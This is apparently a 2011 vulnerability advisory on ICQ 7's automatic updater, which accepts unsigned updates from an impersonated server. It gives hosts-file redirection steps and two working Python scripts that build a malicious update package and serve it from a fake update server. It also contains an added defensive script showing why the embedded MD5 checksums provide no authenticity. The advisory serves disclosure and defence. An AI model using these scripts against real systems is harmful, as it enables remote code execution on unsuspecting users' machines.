
ICQ 7 Failed Origin Check

Posted Jan 14, 2011
Authored by Daniel Seither

ICQ 7 does not check the identity of the update server or the authenticity of the updates that it downloads through its automatic update mechanism. By impersonating the update server (think DNS spoofing), an attacker can act as an update server of its own and deliver arbitrary files that are executed on the next launch of the ICQ client. Since ICQ is automatically launched right after booting Windows by default and it checks for updates on every start, it can be attacked very reliably. Proof of concept code included.

tags | exploit, arbitrary, spoof, proof of concept
systems | windows
SHA-256 | 04f110048b2b3c991e27e6d5e6a6d9b83938b41ab60b12fc8ec01f2728817316

SUMMARY

The ICQ 7 instant messaging client allows remote code execution due to a
flaw in its automatic update mechanism.


VULNERABLE APPLICATIONS

All versions of ICQ 7 for Windows, up to version 7.2, build 3525 (which
is the current version)

ICQ 6 and older versions were not tested.

Other ICQ clients should not be affected since this is a flaw in the ICQ
software update mechanism and not in the ICQ IM protocol.


DETAILS

ICQ 7 does not check the identity of the update server or the
authenticity of the updates that it downloads through its automatic
update mechanism. By impersonating the update server (think DNS
spoofing), an attacker can act as an update server of its own and
deliver arbitrary files that are executed on the next launch of the ICQ
client. Since ICQ is automatically launched right after booting Windows
by default and it checks for updates on every start, it can be attacked
very reliably.
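
Why the MD5 values carried in updates.xml (layout as produced by build_update_files.py under FILES) cannot stand in for an authenticity check, as an added Python 3 example that is not part of the original advisory. The finding codes, function names and the sample manifest's hash and size values are constructed for illustration.

```python
import hashlib
import re
import xml.etree.ElementTree as ET

def wrap(body: bytes) -> bytes:
    """Prefix a manifest body with its MD5 in a comment line (updates.xml layout)."""
    return b"<!--" + hashlib.md5(body).hexdigest().encode() + b"-->\r\n" + body

# Constructed sample manifest; hash and size values are placeholders.
BODY = (b'<manifest productid="30009" build="9999" serial="9">'
        b'<host url="http://update.icq.com/cb/icq6/30009/"/>'
        b'<file id="31" path="ICQ.exe" hash="00000000000000000000000000000000" size="10">'
        b'<file format="zip" size="8" url="ICQ.zip"/>'
        b'</file></manifest>')

def audit_manifest(raw: bytes) -> list:
    """Return sorted finding codes (hypothetical names) for one updates.xml document."""
    m = re.match(rb"<!--([0-9a-f]{32})-->\r\n", raw)
    if m is None:
        return ["NO_CHECKSUM_COMMENT"]
    body = raw[m.end():]
    if hashlib.md5(body).hexdigest().encode() != m.group(1):
        return ["CHECKSUM_MISMATCH"]      # catches corruption, nothing more
    # The comment is an unkeyed digest shipped with the data it covers, so
    # whoever serves the file can recompute it: integrity, not authenticity.
    findings = {"UNKEYED_SELF_CHECKSUM"}
    root = ET.fromstring(body)
    host = root.find("host")
    if host is not None and host.get("url", "").lower().startswith("http://"):
        findings.add("PLAINTEXT_HOST")    # no TLS, server identity unverified
    for entry in root.findall("file"):
        # Per-file hashes inherit the manifest's (missing) authenticity.
        if re.fullmatch(r"[0-9a-fA-F]{32}", entry.get("hash", "")):
            findings.add("FILE_HASH_ONLY_IN_UNSIGNED_MANIFEST")
    return sorted(findings)

def indistinguishable(original: bytes, altered: bytes) -> bool:
    """True if the in-band checks cannot tell the two manifests apart."""
    return audit_manifest(wrap(original)) == audit_manifest(wrap(altered))

if __name__ == "__main__":
    altered = BODY.replace(b"0" * 32, b"f" * 32)    # a different file hash
    stale = wrap(BODY)[:-len(BODY)] + altered       # old comment, new body
    print("sample manifest:", audit_manifest(wrap(BODY)))
    print("altered body, stale comment:", audit_manifest(stale))
    print("altered body, recomputed comment passes:", indistinguishable(BODY, altered))
```

A fix has to anchor trust outside the download channel: a signature over the manifest verified against a key shipped with the client, fetched over a connection that authenticates the server.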


REPRODUCING

(1) Create the files for the update server (see below,
build_update_files.py)

(2) Run a fake update server (see below, run_update_server.py)

(3) Impersonate the update server. To verify the vulnerability, the
easiest way is to add an entry for update.icq.com to the victim's
\Windows\system32\drivers\etc\hosts file that points to the fake update
server's IP address and to clear its DNS cache afterwards (ipconfig
/flushdns).

The next victim that is affected by the impersonation and that launches
the ICQ client will now automatically download and install the fake
update. On the next restart of the ICQ software, the fake ICQ.exe will
be executed.


SOLUTION

Stop using ICQ or switch to another IM client until a fix is released,
since ICQ 7 does not offer a way to disable automatic updates.


TIMELINE

2010-11-12
discovered issue

2010-11-13
reported issue to cert.org

2010-11-30
received confirmation from cert.org that they are trying to contact the vendor

2011-01-13
cert.org publishes vulnerability note because the vendor doesn't react


REFERENCES

Vulnerability Note at cert.org:
http://www.kb.cert.org/vuls/id/680540


FILES

=== START build_update_files.py ===

#!/usr/bin/env python

# ICQ Update File Creator by Daniel Seither (post@tiwoc.de)
#
# Parameter:
# filename of .exe that should be delivered as an update for ICQ.exe
#
# Overwrites ICQ.zip and updates.xml in the current directory
# without a warning!

import sys, os
from hashlib import md5
from zipfile import ZipFile, ZIP_DEFLATED

if len(sys.argv) < 2:
    print "argument missing"
    sys.exit(1)

f = open(sys.argv[1])
payload = f.read()
f.close()

payload_checksum = md5(payload).hexdigest()
payload_size = len(payload)

f = ZipFile('ICQ.zip', 'w')
f.write(sys.argv[1], 'ICQ.exe', ZIP_DEFLATED)
f.close()

payload_compressed = os.path.getsize('ICQ.zip')

updatesfile = ('<manifest productid="30009" build="9999" serial="9">'
    + '<host url="http://update.icq.com/cb/icq6/30009/"/>'
    + '<file id="31" path="ICQ.exe" hash="%s" size="%s">'
    + '<file format="zip" size="%s" url="ICQ.zip"/>'
    + '</file></manifest>'
    ) % (payload_checksum, payload_size, payload_compressed)

updatesfile_checksum = md5(updatesfile).hexdigest()
updatesfile = '<!--%s-->\r\n%s' % (updatesfile_checksum, updatesfile)

f = open('updates.xml', 'w')
f.write(updatesfile)
f.close()

=== END build_update_files.py ===

=== START run_update_server.py ===

#!/usr/bin/env python

# Fake ICQ update server by Daniel Seither (post@tiwoc.de)
#
# Must be run
# * as root
# * from a directory containing updates.xml and ICQ.zip
#   created by build_update_files.py

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class ICQRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/cb/icq6/30009/0/updates.xml':
            self._respond_with_file('updates.xml')
        elif self.path == '/cb/icq6/30009/ICQ.zip':
            self._respond_with_file('ICQ.zip')
        else:
            self.send_error(404)

    def _respond_with_file(self, filename):
        f = open(filename)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(f.read())
        f.close()

httpd = HTTPServer(('', 80), ICQRequestHandler)
httpd.serve_forever()

=== END run_update_server.py ===